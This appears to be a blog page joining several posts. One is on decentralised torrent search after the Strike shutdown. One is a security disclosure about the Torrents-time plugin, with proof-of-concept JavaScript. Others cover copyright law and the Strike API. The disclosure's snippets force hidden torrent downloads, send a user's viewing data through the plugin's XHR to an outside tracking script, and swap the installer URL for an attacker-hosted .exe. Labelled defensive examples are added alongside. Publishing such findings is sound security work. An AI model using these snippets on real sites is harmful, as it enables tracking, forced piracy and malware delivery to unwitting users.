#torrents
When I shut down Strike last December, millions of users lost their go-to media site, developers who relied on my API lost access to the data, and everyone was left with the all too familiar thought of, “what now?”
P2P file sharing services collectively suffer from the issue of monetization. Every new torrent tracker on the scene seems to be yet another end-all-be-all centralized source for content. Over time, everyone begins to rely on these sites, they grow larger and larger, the operators make a lot of money, eventually the MPAA or ███ gets angry and has the owners arrested and the site shut down, and the cycle begins anew.
With Strike I attempted to do something new: a torrent search engine that didn’t present you with ads or sponsored content, and instead simply gave the user the ability to find information. Because I had no motivations of profit from it, I was able to make the data free and open for anyone to use, but it still suffered from the issue of being centralized.
For Strike’s final (and abandoned) version, I created a prototype that solved this issue; by creating software that runs on a local system and crawls DHT for infohashes, it cuts out the need for an HTTP-based solution. By writing software that indexes file information into a full-text searchable format, you’ve already solved the problem. While this process can be slow, the data set grows over time, and you can ensure that the data remains fresh by monitoring active swarms.
The key to healthy growth, no matter the subject, is to keep development simple. A server counterpart to this should only do a couple of things:
- Collect file information from hashes
- Query said data
- Allow plugins to handle said data
By creating the means to collect and parse the data, you’ve done your part. The plugin system means it’s up to developers to handle the data however they wish. This results in the community constantly creating new solutions to problems and a drive to innovate.
Imagine that someone creates a plugin that allows you to connect to another person or another community’s database, where you can then search for things in both datasets and merge the two. While this would be possible with a plugin-enabled centralized community, users would know that they will always have the same data available to them at all times.
It’s time we said goodbye to the traditional trackers and became self-reliant. So long as torrent trackers remain malware-infested hubs with top 100 lists, we are never going to see P2P’s image as a piracy haven begin to heal.
Thanks for reading,
What is Torrents-time
A “new” method of streaming torrents in your web browser, based around existing technologies. Torrents-time was quickly adopted by a majority of torrent sites due to its ability to embed a player on the page to stream video content from torrents.
Tear down
Torrents-time binds the following ports:
- 8082: Node.js webserver
- 12400: main application
- 9220: web socket server
Exposed API
- https://localhost.ttconfig.xyz:12400/api.js
- https://127.0.0.1:12400/api.js - leads to an insecure HTTPS connection; it listens for requests.
- https://localhost.ttconfig.xyz:12400/vpnpropmt?version=r1 - block this and everything related to it. Anonymous VPNs are very untrustworthy and make you the product.
3rd parties being called (why would you do this)
- 1337.to
- moviedb
- anonymousvpn
Profiting from VPN “partnership”, trusting a random VPN service is a writeup for another day.
Attack Vectors
This service stupidly abuses CORS; even worse, it exposes a CORS-enabled XHR object after requesting an instance of the plugin. So let’s take advantage of that.
We don’t need anything more to do this attack than:
    <html>
    <head lang="en">
        <meta charset="UTF-8">
        <title>Hello World</title>
        <script src="torrents.js"></script>
        <script src="https://localhost.ttconfig.xyz:12400/api.js"></script>
        <script src="attack.js"></script>
    </head>
    <body>
    </body>
    </html>
Here torrents.js is their CDN code. Once the first two scripts are loaded, attack.js can make use of all of torrentsTime’s useful functions on any page.
So in a few seconds we can get torrentTime on any HTML5 page, that’s great!
Except now I’m free to do a few things.
Concern 1 - Forced Piracy
Because I can make an invisible player, I’m free to force you to torrent whatever I like, even if you had no intention of streaming said content, with a line of code:
torrentsTime.instances.i0.start();
Great, you were just forced to torrent illegal content insecurely. You can do this for an unlimited amount of content. I can use any publisher ID as well.
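On the defensive side, a local helper service that web pages can reach should decide per request which origin may drive it. The following is an added example, not Torrents-time code and not from the original post: it assumes the weak behaviour is "answer any origin", and the allowlisted origin, the `/start` path and the function names are constructed for illustration.

```javascript
'use strict';
// Added example. Origins, paths and function names are constructed assumptions.
const ALLOWED_ORIGINS = new Set(['https://player.example']);

// Weak policy (assumed): reflect whatever origin asks, so any page can read replies
// and every request is processed.
function weakPolicy(req) {
  return {
    status: 200,
    headers: { 'Access-Control-Allow-Origin': req.headers.origin || '*' },
  };
}

// Hardened policy: reject before the action runs. Leaving out CORS headers alone is
// not enough, because the browser still delivers the request and its side effects;
// CORS only controls whether the calling page may read the response.
function strictPolicy(req) {
  const origin = req.headers.origin;
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    return { status: 403, headers: {} };
  }
  if (req.method === 'OPTIONS') {
    // Preflight: answer for this one origin only, never "*".
    return {
      status: 204,
      headers: {
        'Access-Control-Allow-Origin': origin,
        'Access-Control-Allow-Methods': 'GET, POST',
        Vary: 'Origin',
      },
    };
  }
  return { status: 200, headers: { 'Access-Control-Allow-Origin': origin, Vary: 'Origin' } };
}

// Constructed requests: one from the allowlisted site, one from an unrelated page.
const fromPlayer = { method: 'POST', url: '/start', headers: { origin: 'https://player.example' } };
const fromOther = { method: 'POST', url: '/start', headers: { origin: 'https://unrelated.example' } };

// Compare both policies on both requests.
function demo() {
  return [fromPlayer, fromOther].map((req) => ({
    origin: req.headers.origin,
    weak: weakPolicy(req).status,
    strict: strictPolicy(req).status,
  }));
}

console.log(demo());
```

The same decision applies to a WebSocket handshake, which also carries an Origin header the server can check before upgrading.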
Concern 2 - User Tracking/Privacy
Let’s say I’m an advertiser/group with access to JavaScript on a website. With a few lines of code, not only can I tell who you are, I can send all that data using torrentsTime’s very exposed xhr object.
    function driveBy() {
        // Torrents-time detected!
        // i0 is the first instance; loop over instances to get all currently started torrents
        var torrentTitle = torrentsTime.instances.i0.setup.title;
        var browser = torrentsTime.instances.i0.setup.browser;
        var filetype = torrentsTime.instances.i0.setup.fileType;
        // any other code we want to do on the page
        // this supports callback/JSONP
        // use the exposed xhr
        torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" + filetype, callback);
    }

    function callback(data) {
        console.log(data);
    }
Instant results
Concern 3 - Even more privacy issues
Every time you make a request to the CDN the following data is logged by Torrents-time servers
IP, location (country), user agent, cookies, and likely the exact page you requested the CDN from. Furthermore, within the C code you can see the use of private keys masking SOMETHING which does indeed make HTTP requests; I’ve yet to break this.
Concern 4 - It runs as root on OSX
It runs as root on OSX. I really don’t need to say more.
Concern 5 - Redirect Plugin Download
Redirecting the download for the plugin is again only a single line of code:
    torrentsTime.setup.installerURL.windows = "https://andrew.im/sandbox/torrentsTime-download.exe";
After that you just fire:
    torrentsTime.downloadInstaller();
Or when a user clicks the plugin download, they will be greeted with a legit looking prompt
Concern 6 - XSS
Seems just about every site with TT installed is vulnerable to XSS now.
Piratebay
Concern 7 - Skyrocket CPU usage/crash it
Literally just ping the server with 1024 bytes and the CPU usage stays between 50% and 80%; no idea why this one even occurs. The program later crashes when sending random strings, so there is a possible buffer overflow waiting to be exploited.
Concern 8 - Bundled Certs
Includes the private keys for their ‘encrypted’ comms channel. Details here. UPDATE: their cert for localhost has been revoked.
Resources
You can download the Torrents-time C code here, as well as all the Node.js code used on your computer:
https://mega.nz/#F!pklQQChQ!1VCTBgQQ9ticT8rm_TzGRw
Threat level
Seriously, remove this software from your computer, if you put it on your site, remove it, if you think about adding it, don’t. More exploits coming soon!
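For site operators acting on this advice, an added example (not from the original post) that scans page source for the local Torrents-time endpoints and ports listed in the teardown above. The sample page, the function names and the matching rule (the listed hostname on any port, or 127.0.0.1 on one of the three listed ports) are constructed assumptions.

```javascript
'use strict';
// Added example. Indicators come from the teardown in this post; everything else
// (function names, sample page) is constructed for illustration.
const TT_HOSTNAME = 'localhost.ttconfig.xyz';
const TT_LOOPBACK = '127.0.0.1';
const TT_PORTS = new Set(['8082', '12400', '9220']);

// Pull every absolute http(s)/ws(s) URL out of markup or inline script text.
function extractUrls(html) {
  return html.match(/\b(?:https?|wss?):\/\/[^\s"'<>)]+/gi) || [];
}

// Return one finding per URL that points at the local Torrents-time service.
function findTorrentsTimeRefs(html) {
  const findings = [];
  for (const raw of extractUrls(html)) {
    let u;
    try {
      u = new URL(raw);
    } catch (e) {
      continue; // not a parseable URL, ignore it
    }
    const host = u.hostname.toLowerCase();
    const namedHost = host === TT_HOSTNAME;
    const loopbackPort = host === TT_LOOPBACK && TT_PORTS.has(u.port);
    if (namedHost || loopbackPort) {
      findings.push({ url: raw, host: host, port: u.port || '(default)' });
    }
  }
  return findings;
}

// Constructed sample page: two references that should be flagged, two that should not.
const samplePage = `
<script src="https://cdn.example/jquery.js"></script>
<script src="https://localhost.ttconfig.xyz:12400/api.js"></script>
<script>var s = new WebSocket('wss://127.0.0.1:9220/');</script>
<a href="http://127.0.0.1:3000/dev">local dev server</a>`;

console.log(findTorrentsTimeRefs(samplePage));
```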
Even more info written by /u/thecodingdude can be found on Reddit
Contact
Andrew Sampson
- @Andrewmd5
- Email: [email protected]
I implore Congress to amend the statute to reflect the realities of file sharing. There is something wrong with a law that routinely threatens teenagers and students with astronomical penalties for an activity whose implications they may not have fully understood. The injury to the copyright holder may be real, and even substantial, but, under the statute, the record companies do not even have to prove actual damage.
In the US courts it’s not about who is right or wrong, people can judge this for themselves, it’s about how much money can you spend. My only fear is that this lawsuit opens up other websites and services to attack. Aurous operated in the blind, our client just allowed people to utilize the APIs of 3rd party websites (YouTube, Soundcloud), even then look where we ended up.
https://getstrike.net/api/torrents/top/?category=all
You can get the top 100 for a category; for example, anime would be:
https://getstrike.net/api/torrents/top/?category=Anime
Here is a list of all valid categories
Anime
Applications
Books
Games
HD Video Deprecated
Movies
Music
Other
TV
XXX
Once the new API/Core engine rewrites come (sometime after I move) you’ll have a ton more filtering options, so don’t worry. This will include subcategories and whatnot.
Enjoy. The index will be updated once an hour just like everything else.